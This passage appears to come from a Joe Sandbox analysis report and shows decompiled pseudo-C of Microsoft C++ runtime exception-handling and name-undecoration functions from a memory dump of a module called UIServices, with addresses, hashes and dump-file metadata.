                                                    0x7ffc23563806
                                                    0x7ffc23563812
                                                    0x7ffc2356381a
                                                    0x7ffc23563820
                                                    0x7ffc23563832
                                                    0x7ffc23563837
                                                    0x7ffc2356383a
                                                    0x7ffc2356383f
                                                    0x7ffc23563848
                                                    0x7ffc2356384d
                                                    0x7ffc23563856
                                                    0x7ffc2356385c
                                                    0x7ffc23563861
                                                    0x7ffc23563866
                                                    0x7ffc2356386b
                                                    0x7ffc23563892
                                                    0x7ffc2356389a
                                                    0x7ffc2356389e
                                                    0x7ffc235638b9
                                                    0x7ffc235638c1
                                                    0x7ffc235638c5
                                                    0x7ffc235638e0
                                                    0x7ffc235638e8
                                                    0x7ffc235638f0
                                                    0x7ffc235638f6
                                                    0x7ffc235638fe
                                                    0x7ffc23563900
                                                    0x7ffc23563904
                                                    0x7ffc2356390b
                                                    0x7ffc23563930

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: 5d15f68c4dd8f56a710f480657a434a9006b6843fccaef8df8c10feb4636c5e6
                                                    • Instruction ID: 599e2bab537262ee914948ab668586172933f10f81c9b130252a9ffb769156df
                                                    • Opcode Fuzzy Hash: 5d15f68c4dd8f56a710f480657a434a9006b6843fccaef8df8c10feb4636c5e6
                                                    • Instruction Fuzzy Hash: 08917FB3F08BA98AE710CB65E8802AD7BB0FB45788F144175EA8D27765DF38D195CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC2356B428(void* __edx, void* __edi, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, long long __r8, void* __r14, long long _a8, long long _a16) {
                                                    				intOrPtr _v16;
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _t21;
                                                    				char _t23;
                                                    				char _t28;
                                                    				void* _t33;
                                                    				void* _t38;
                                                    				char* _t46;
                                                    				long long _t50;
                                                    				char* _t52;
                                                    				intOrPtr* _t55;
                                                    				long long _t62;
                                                    
                                                    				_t62 = __r8;
                                                    				_t57 = __rsi;
                                                    				_t33 = __rax;
                                                    				_t27 = __edi;
                                                    				_t26 = __edx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rdi;
                                                    				r8d = 0;
                                                    				_t55 = __rdx;
                                                    				_t46 =  *0x23574360; // 0x0
                                                    				_t38 = __rcx;
                                                    				_v40 = __r8;
                                                    				_v32 = r8d;
                                                    				_t23 =  *_t46;
                                                    				_t28 = _t23;
                                                    				if (_t28 == 0) goto 0x2356b4ef;
                                                    				if (_t28 == 0) goto 0x2356b4e0;
                                                    				if (_t28 == 0) goto 0x2356b4ad;
                                                    				if (_t23 - 7 == 1) goto 0x2356b47c;
                                                    				E00007FFC7FFC23568898(__edx, __edi, __rcx, __rcx, __rdx, __rdx, __rsi, __r14);
                                                    				goto 0x2356b50d;
                                                    				if ( *_t55 == _t62) goto 0x2356b494;
                                                    				r8d = 9;
                                                    				goto 0x2356b4a1;
                                                    				r8d = 8;
                                                    				E00007FFC7FFC23566B04(_t33, _t38,  &_v40, "volatile", _t55, _t57);
                                                    				_t50 =  *0x23574360; // 0x0
                                                    				r9d = 2;
                                                    				_v24 =  *_t55;
                                                    				asm("bts eax, 0x8");
                                                    				 *0x23574360 = _t50 + 1;
                                                    				_t52 =  &_v40;
                                                    				_v16 =  *((intOrPtr*)(_t55 + 8));
                                                    				E00007FFC7FFC2356B8A8(_t26, _t27, _t38, _t38, _t52, _t55, _t57,  &_v24);
                                                    				goto 0x2356b50d;
                                                    				_t21 =  *((intOrPtr*)(_t52 + 1));
                                                    				if (_t21 == 0x24) goto 0x2356b520;
                                                    				if (_t21 != 0) goto 0x2356b61e;
                                                    				_v16 = r8d;
                                                    				_v24 = 0x23571ac0;
                                                    				return E00007FFC7FFC23566F74( &_v24, _t38, _t55);
                                                    			}

















                                                    0x7ffc2356b428
                                                    0x7ffc2356b428
                                                    0x7ffc2356b428
                                                    0x7ffc2356b428
                                                    0x7ffc2356b428
                                                    0x7ffc2356b428
                                                    0x7ffc2356b42d
                                                    0x7ffc2356b43a
                                                    0x7ffc2356b43d
                                                    0x7ffc2356b440
                                                    0x7ffc2356b447
                                                    0x7ffc2356b44a
                                                    0x7ffc2356b44e
                                                    0x7ffc2356b452
                                                    0x7ffc2356b455
                                                    0x7ffc2356b457
                                                    0x7ffc2356b460
                                                    0x7ffc2356b465
                                                    0x7ffc2356b46a
                                                    0x7ffc2356b472
                                                    0x7ffc2356b477
                                                    0x7ffc2356b483
                                                    0x7ffc2356b485
                                                    0x7ffc2356b492
                                                    0x7ffc2356b494
                                                    0x7ffc2356b4a1
                                                    0x7ffc2356b4a6
                                                    0x7ffc2356b4ad
                                                    0x7ffc2356b4ba
                                                    0x7ffc2356b4c7
                                                    0x7ffc2356b4cb
                                                    0x7ffc2356b4d2
                                                    0x7ffc2356b4d6
                                                    0x7ffc2356b4d9
                                                    0x7ffc2356b4de
                                                    0x7ffc2356b4e0
                                                    0x7ffc2356b4e5
                                                    0x7ffc2356b4e9
                                                    0x7ffc2356b4f6
                                                    0x7ffc2356b4fa
                                                    0x7ffc2356b51f

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                    • API String ID: 2943138195-757766384
                                                    • Opcode ID: 75c4db024949df2d24ab21bd94cb90a7bdec3444905746c1734e11322e8c0ddb
                                                    • Instruction ID: 87084865a00505c637b5c361870c2bc9e99d9babbbb9fc8d4c57d6c4318133b0
                                                    • Opcode Fuzzy Hash: 75c4db024949df2d24ab21bd94cb90a7bdec3444905746c1734e11322e8c0ddb
                                                    • Instruction Fuzzy Hash: 04716CB1F08A6A84EB10CF26EC550BC77A5FF04780F8441B5DA4D66A98DF3CE290CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00007FFC7FFC23563430(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                    				void* _t19;
                                                    				void* _t27;
                                                    				void* _t36;
                                                    				void* _t39;
                                                    				void* _t42;
                                                    				void* _t43;
                                                    				void* _t45;
                                                    				void* _t46;
                                                    				void* _t52;
                                                    				void* _t54;
                                                    				void* _t56;
                                                    				void* _t59;
                                                    
                                                    				_t27 = _t45;
                                                    				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                    				 *((long long*)(_t27 + 0x18)) = __r8;
                                                    				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                    				_t43 = _t27 - 0x3f;
                                                    				_t46 = _t45 - 0xc0;
                                                    				if ( *__rcx == 0x80000003) goto 0x235634d4;
                                                    				E00007FFC7FFC235664B0(_t27);
                                                    				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                    				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x235634ef;
                                                    				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                    				E00007FFC7FFC235664B0(_t27);
                                                    				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x235634ef;
                                                    				if ( *__rcx == 0xe0434f4d) goto 0x235634ef;
                                                    				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                    				if ( *__rcx == 0xe0434352) goto 0x235634f3;
                                                    				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                    				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                    				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                    				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                    				_t19 = E00007FFC7FFC2356E54C(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                    				if (_t19 == 0) goto 0x235634f3;
                                                    				return _t19;
                                                    			}















                                                    0x7ffc23563430
                                                    0x7ffc23563433
                                                    0x7ffc23563437
                                                    0x7ffc2356343b
                                                    0x7ffc2356344a
                                                    0x7ffc2356344e
                                                    0x7ffc23563464
                                                    0x7ffc23563466
                                                    0x7ffc2356346b
                                                    0x7ffc23563478
                                                    0x7ffc2356347c
                                                    0x7ffc23563485
                                                    0x7ffc2356348e
                                                    0x7ffc23563497
                                                    0x7ffc235634a0
                                                    0x7ffc235634a4
                                                    0x7ffc235634b4
                                                    0x7ffc235634bc
                                                    0x7ffc235634c1
                                                    0x7ffc235634c6
                                                    0x7ffc235634cb
                                                    0x7ffc235634d2
                                                    0x7ffc235634ee

                                                    APIs
                                                      • Part of subcall function 00007FFC235664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC235620FE), ref: 00007FFC235664BE
                                                    • EncodePointer.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,00007FFC23562ED3), ref: 00007FFC2356347C
                                                    • _CallSETranslator.LIBVCRUNTIME ref: 00007FFC235634CB
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00000000,?,?,?,?,00007FFC23562ED3), ref: 00007FFC2356363F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: c6edc7f7cb8306c103728bca328dc039afe248f88da60de6e3abdbadd5903433
                                                    • Instruction ID: b9df263426849235f104f8bb890e98e79956dee1f62b6a75d33d09c1a3d58847
                                                    • Opcode Fuzzy Hash: c6edc7f7cb8306c103728bca328dc039afe248f88da60de6e3abdbadd5903433
                                                    • Instruction Fuzzy Hash: EF613732F08A998AE7218F65D8803ADB7A0FB44B88F044175EF5D27B69DF38E055CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC235652C0(void* __edi, intOrPtr* __rcx, void* __rdx, void* __r9) {
                                                    				signed int _v72;
                                                    				intOrPtr _v92;
                                                    				intOrPtr _v96;
                                                    				signed long long _v104;
                                                    				signed long long _v112;
                                                    				void* _v120;
                                                    				signed long long _v128;
                                                    				intOrPtr _v136;
                                                    				void* _t43;
                                                    				void* _t44;
                                                    				void* _t50;
                                                    				intOrPtr _t53;
                                                    				signed long long _t71;
                                                    				signed long long _t72;
                                                    				void* _t73;
                                                    				intOrPtr _t74;
                                                    				intOrPtr* _t75;
                                                    				intOrPtr _t76;
                                                    				intOrPtr* _t97;
                                                    				signed long long _t99;
                                                    
                                                    				_t99 =  &_v120;
                                                    				_t71 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				_t72 = _t71 ^ _t99;
                                                    				_v72 = _t72;
                                                    				_v104 = _t99;
                                                    				if (__rcx == 0) goto 0x23565453;
                                                    				_t75 =  *((intOrPtr*)(__rcx));
                                                    				if (__rdx == 0) goto 0x23565302;
                                                    				if ( *((char*)(__rdx + 0x10)) != 0) goto 0x23565324;
                                                    				if ( *_t75 == 0xe0434f4d) goto 0x23565470;
                                                    				if ( *_t75 == 0xe0434352) goto 0x23565470;
                                                    				if ((sil & 0x00000040) == 0) goto 0x23565470;
                                                    				if ( *_t75 != 0xe06d7363) goto 0x23565453;
                                                    				if ( *((intOrPtr*)(_t75 + 0x18)) != 4) goto 0x23565453;
                                                    				if ( *((intOrPtr*)(_t75 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23565453;
                                                    				if ( *((long long*)(_t75 + 0x30)) != 0) goto 0x2356536b;
                                                    				E00007FFC7FFC235664B0(_t72);
                                                    				if ( *((long long*)(_t72 + 0x20)) == 0) goto 0x23565453;
                                                    				E00007FFC7FFC235664B0(_t72);
                                                    				_t76 =  *((intOrPtr*)(_t72 + 0x20));
                                                    				E00007FFC7FFC2356F084(_t72,  *((intOrPtr*)(_t76 + 0x38)));
                                                    				E00007FFC7FFC2356F044(_t72);
                                                    				_v112 = _t72;
                                                    				__imp__RtlPcToFileHeader();
                                                    				_v128 = _t72;
                                                    				E00007FFC7FFC2356F06C(_t72, _t72);
                                                    				_v92 = __edi - _v128;
                                                    				asm("bts esi, 0x1f");
                                                    				_v96 = r8d;
                                                    				E00007FFC7FFC2356F058(_t72);
                                                    				_t73 = _t72 + 4;
                                                    				_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x30)) + 0xc)) + _t73;
                                                    				_v120 = _t97;
                                                    				E00007FFC7FFC2356F058(_t73);
                                                    				_t53 =  *((intOrPtr*)(_t73 +  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x30)) + 0xc))));
                                                    				_v136 = _t53;
                                                    				if (_t53 <= 0) goto 0x2356544b;
                                                    				_t43 = E00007FFC7FFC2356F058(_t73);
                                                    				_t74 =  *_t97;
                                                    				0x23565260();
                                                    				if (_t43 == 0) goto 0x2356543a;
                                                    				_t44 = E00007FFC7FFC235664B0(_t74);
                                                    				 *((intOrPtr*)(_t74 + 0x30)) =  *((intOrPtr*)(_t74 + 0x30)) + 1;
                                                    				if (__r9 == 0) goto 0x23565420;
                                                    				0x23565240();
                                                    				E00007FFC7FFC23561940(_t44, _v104, 0x23565433);
                                                    				goto 0x23565455;
                                                    				_v136 = _t53 - 1;
                                                    				_v120 = _t97 + 4;
                                                    				goto 0x235653d9;
                                                    				E00007FFC7FFC2356F06C(_t74, _t72);
                                                    				return E00007FFC7FFC2356F5B0(_t50, _t74, _v72 ^ _t99, 0x23565433);
                                                    			}























                                                    0x7ffc235652ca
                                                    0x7ffc235652ce
                                                    0x7ffc235652d5
                                                    0x7ffc235652d8
                                                    0x7ffc235652dd
                                                    0x7ffc235652ee
                                                    0x7ffc235652f4
                                                    0x7ffc235652fa
                                                    0x7ffc23565300
                                                    0x7ffc23565308
                                                    0x7ffc23565314
                                                    0x7ffc2356531e
                                                    0x7ffc2356532a
                                                    0x7ffc23565334
                                                    0x7ffc23565345
                                                    0x7ffc23565350
                                                    0x7ffc23565352
                                                    0x7ffc2356535c
                                                    0x7ffc23565362
                                                    0x7ffc23565367
                                                    0x7ffc2356536f
                                                    0x7ffc23565374
                                                    0x7ffc2356537c
                                                    0x7ffc23565389
                                                    0x7ffc2356538f
                                                    0x7ffc23565397
                                                    0x7ffc235653a0
                                                    0x7ffc235653a4
                                                    0x7ffc235653a8
                                                    0x7ffc235653ac
                                                    0x7ffc235653b9
                                                    0x7ffc235653bd
                                                    0x7ffc235653c0
                                                    0x7ffc235653c5
                                                    0x7ffc235653d2
                                                    0x7ffc235653d5
                                                    0x7ffc235653db
                                                    0x7ffc235653dd
                                                    0x7ffc235653e5
                                                    0x7ffc235653f7
                                                    0x7ffc235653fe
                                                    0x7ffc23565400
                                                    0x7ffc23565405
                                                    0x7ffc2356540b
                                                    0x7ffc2356541b
                                                    0x7ffc2356542c
                                                    0x7ffc23565438
                                                    0x7ffc2356543c
                                                    0x7ffc23565444
                                                    0x7ffc23565449
                                                    0x7ffc2356544e
                                                    0x7ffc2356546f

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: FileHeader
                                                    • String ID: MOC$RCC$csm$csm
                                                    • API String ID: 104395404-1441736206
                                                    • Opcode ID: 2cec3f267395be9d96b953e49dea6fc3c58bea9edd68278d49fbbe80deba14be
                                                    • Instruction ID: 54e1bf1a2f3a04f6bb72d631d10b951c363cc5ca2a20251d9b81365cf2b4395b
                                                    • Opcode Fuzzy Hash: 2cec3f267395be9d96b953e49dea6fc3c58bea9edd68278d49fbbe80deba14be
                                                    • Instruction Fuzzy Hash: 02519F32F0862A86EB609F26D84137D26A0FF84B96F0445B5EF4D66785CF7CE481CE61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 92%
                                                    			E00007FFC7FFC23569BAC(void* __edx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, long long __r14) {
                                                    				void* _v8;
                                                    				char _v24;
                                                    				char _v40;
                                                    				char _v56;
                                                    				intOrPtr _v64;
                                                    				char _v72;
                                                    				void* _t31;
                                                    				void* _t34;
                                                    				void* _t35;
                                                    				signed int _t36;
                                                    				signed int _t37;
                                                    				void* _t40;
                                                    				void* _t54;
                                                    				char* _t65;
                                                    				char* _t66;
                                                    				char _t78;
                                                    				long long* _t85;
                                                    				void* _t92;
                                                    
                                                    				_t54 = _t92;
                                                    				 *((long long*)(_t54 + 8)) = __rbx;
                                                    				 *((long long*)(_t54 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t54 + 0x18)) = __rdi;
                                                    				 *((long long*)(_t54 + 0x20)) = __r14;
                                                    				r14d = 0;
                                                    				_t85 = __rcx;
                                                    				_t65 =  *0x23574360; // 0x0
                                                    				sil = __edx;
                                                    				if ( *_t65 != 0x51) goto 0x23569beb;
                                                    				_t66 = _t65 + 1;
                                                    				 *0x23574360 = _t66;
                                                    				_t78 =  *_t66;
                                                    				if (__edx != 0) goto 0x23569c06;
                                                    				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                    				 *__rcx = 0x23571ac0;
                                                    				goto 0x23569cd9;
                                                    				_t6 = _t78 - 0x30; // -48
                                                    				if (_t6 - 9 > 0) goto 0x23569c6a;
                                                    				 *0x23574360 = _t66 + 1;
                                                    				if (1 == 0) goto 0x23569c52;
                                                    				_t7 = _t78 - 0x2f; // -47
                                                    				E00007FFC7FFC23566E4C(_t7,  &_v56, _t7, __r10);
                                                    				E00007FFC7FFC23566CF4(0x23571ac0,  &_v40, 0x23574008);
                                                    				_t31 = E00007FFC7FFC23566F74(0x23571ac0,  &_v72, 0x23571ac0);
                                                    				goto 0x23569c5f;
                                                    				E00007FFC7FFC23566E4C(_t31,  &_v24,  &_v72 - 0x2f, __r10);
                                                    				 *_t85 = _v72;
                                                    				goto 0x23569cd6;
                                                    				_t34 = E00007FFC7FFC2356D614(_t40,  &_v72,  &_v72 - 0x2f);
                                                    				if (_v64 == r14b) goto 0x23569cb6;
                                                    				 *0x23574360 =  *0x23574360 + 1;
                                                    				if (sil == 0) goto 0x23569ca3;
                                                    				if (1 == 0) goto 0x23569c98;
                                                    				_t35 = E00007FFC7FFC23566DA4(_t34,  &_v24, _v72, __r11);
                                                    				goto 0x23569c2a;
                                                    				_t36 = E00007FFC7FFC23566DA4(_t35,  &_v56, _v72, __r11);
                                                    				goto 0x23569c5f;
                                                    				if (1 == 0) goto 0x23569cb0;
                                                    				goto 0x23569c25;
                                                    				goto 0x23569c5a;
                                                    				_t59 =  !=  ? __r14 : 0x23571ac0;
                                                    				 *_t85 =  !=  ? __r14 : 0x23571ac0;
                                                    				asm("sbb eax, eax");
                                                    				_t37 = _t36 & 0x00000002;
                                                    				 *(_t85 + 8) = _t37;
                                                    				return _t37;
                                                    			}





















                                                    0x7ffc23569bac
                                                    0x7ffc23569baf
                                                    0x7ffc23569bb3
                                                    0x7ffc23569bb7
                                                    0x7ffc23569bbb
                                                    0x7ffc23569bc7
                                                    0x7ffc23569bca
                                                    0x7ffc23569bcd
                                                    0x7ffc23569bd4
                                                    0x7ffc23569bdd
                                                    0x7ffc23569bdf
                                                    0x7ffc23569be4
                                                    0x7ffc23569beb
                                                    0x7ffc23569bf1
                                                    0x7ffc23569bfa
                                                    0x7ffc23569bfe
                                                    0x7ffc23569c01
                                                    0x7ffc23569c06
                                                    0x7ffc23569c0b
                                                    0x7ffc23569c10
                                                    0x7ffc23569c19
                                                    0x7ffc23569c1b
                                                    0x7ffc23569c25
                                                    0x7ffc23569c38
                                                    0x7ffc23569c47
                                                    0x7ffc23569c50
                                                    0x7ffc23569c5a
                                                    0x7ffc23569c65
                                                    0x7ffc23569c68
                                                    0x7ffc23569c6e
                                                    0x7ffc23569c77
                                                    0x7ffc23569c79
                                                    0x7ffc23569c87
                                                    0x7ffc23569c8b
                                                    0x7ffc23569c91
                                                    0x7ffc23569c96
                                                    0x7ffc23569c9c
                                                    0x7ffc23569ca1
                                                    0x7ffc23569ca5
                                                    0x7ffc23569cab
                                                    0x7ffc23569cb4
                                                    0x7ffc23569cc8
                                                    0x7ffc23569cce
                                                    0x7ffc23569cd1
                                                    0x7ffc23569cd3
                                                    0x7ffc23569cd6
                                                    0x7ffc23569cf5

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: NameName::$Name::operator+
                                                    • String ID:
                                                    • API String ID: 826178784-0
                                                    • Opcode ID: be68444817dde28ece6064d07fb383e8d3edc1c4f56f1be194b1a347b742f1a4
                                                    • Instruction ID: 0771157a081f13f516c64d33722247056d1f9634b8bea44a8da8b138ce899617
                                                    • Opcode Fuzzy Hash: be68444817dde28ece6064d07fb383e8d3edc1c4f56f1be194b1a347b742f1a4
                                                    • Instruction Fuzzy Hash: 04414872F08A6A84FB14CB21EC901B837F4FB56B80B9840B2DA4D67795DF38E555CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E00007FFC7FFC23563DE4(void* __ecx, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rsi, void* __r8, void* __r9) {
                                                    				void* __rdi;
                                                    				void* __r14;
                                                    				void* _t73;
                                                    				intOrPtr _t78;
                                                    				void* _t102;
                                                    				unsigned int _t105;
                                                    				void* _t132;
                                                    				intOrPtr _t136;
                                                    				intOrPtr* _t141;
                                                    				signed char* _t145;
                                                    				long long _t146;
                                                    				void* _t170;
                                                    				signed char* _t171;
                                                    				long long _t175;
                                                    				void* _t176;
                                                    				void* _t178;
                                                    				void* _t179;
                                                    				void* _t194;
                                                    				long long _t195;
                                                    				void* _t197;
                                                    
                                                    				_t132 = __rax;
                                                    				 *((long long*)(_t178 + 8)) = __rbx;
                                                    				 *((long long*)(_t178 + 0x10)) = _t175;
                                                    				 *((long long*)(_t178 + 0x18)) = __rsi;
                                                    				_t179 = _t178 - 0x80;
                                                    				_t141 = __rcx;
                                                    				_t176 = __r9;
                                                    				_t195 = __rdx;
                                                    				E00007FFC7FFC23561894(_t73, __r8);
                                                    				E00007FFC7FFC235664B0(_t132);
                                                    				_t171 =  *((intOrPtr*)(_t179 + 0xc0));
                                                    				r8d = 0x80000029;
                                                    				r9d = 0x80000026;
                                                    				if ( *((intOrPtr*)(_t132 + 0x40)) != 0) goto 0x23563e5e;
                                                    				if ( *__rcx == 0xe06d7363) goto 0x23563e5e;
                                                    				if ( *__rcx != r8d) goto 0x23563e50;
                                                    				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x23563e55;
                                                    				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x23563e5e;
                                                    				if ( *__rcx == r9d) goto 0x23563e5e;
                                                    				if (( *_t171 & 0x00000020) != 0) goto 0x2356404b;
                                                    				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x23563f7d;
                                                    				if (_t171[8] == 0) goto 0x2356404b;
                                                    				if ( *(_t171[8] +  *((intOrPtr*)(__r9 + 8)) -  *((char*)(__r8 + 0x7ffc23570410)) - 4) >>  *(__r8 + 0x7ffc23570420) == 0) goto 0x2356404b;
                                                    				if ( *((intOrPtr*)(_t179 + 0xc8)) != 0) goto 0x2356404b;
                                                    				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x23563f6a;
                                                    				if ( *__rcx != r9d) goto 0x23563f22;
                                                    				_t145 = _t171;
                                                    				_t78 = E00007FFC7FFC2356E250(_t102, __rcx, _t145, __r9, _t171, __rsi,  *((intOrPtr*)(__r9 + 0x20)), _t195, _t197, _t194);
                                                    				r9d = _t78;
                                                    				if (_t78 - 0xffffffff < 0) goto 0x23563f63;
                                                    				if (_t171[8] == 0) goto 0x23563f0a;
                                                    				_t105 =  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) - _t145[0x7ffc23570410] - 4) >> _t145[0x7ffc23570420];
                                                    				if (r9d - _t105 >= 0) goto 0x23563f63;
                                                    				_t146 = _t195;
                                                    				E00007FFC7FFC23564ACC(_t146, _t176, _t171);
                                                    				goto 0x2356404b;
                                                    				if ( *__rcx != r8d) goto 0x23563f6a;
                                                    				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                                    				if (r9d - 0xffffffff < 0) goto 0x23563f63;
                                                    				if (r9d -  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) -  *((char*)(_t146 + 0x7ffc23570410)) - 4) >>  *(_t146 + 0x7ffc23570420) >= 0) goto 0x23563f63;
                                                    				goto 0x23563f12;
                                                    				abort();
                                                    				asm("int3");
                                                    				E00007FFC7FFC2356E804( *((char*)(_t146 + 0x7ffc23570410)), _t195, _t171);
                                                    				goto 0x2356404b;
                                                    				E00007FFC7FFC235640EC(_t179 + 0x50, _t171,  *((intOrPtr*)(_t176 + 8)));
                                                    				if ( *((intOrPtr*)(_t179 + 0x50)) != _t105) goto 0x23563f9d;
                                                    				if (( *_t171 & 0x00000040) == 0) goto 0x2356404b;
                                                    				if ( *_t141 != 0xe06d7363) goto 0x23564012;
                                                    				if ( *((intOrPtr*)(_t141 + 0x18)) - 3 < 0) goto 0x23564012;
                                                    				if ( *((intOrPtr*)(_t141 + 0x20)) - 0x19930522 <= 0) goto 0x23564012;
                                                    				_t136 =  *((intOrPtr*)(_t141 + 0x30));
                                                    				if ( *((intOrPtr*)(_t136 + 8)) == _t105) goto 0x23564012;
                                                    				E00007FFC7FFC2356F058(_t136);
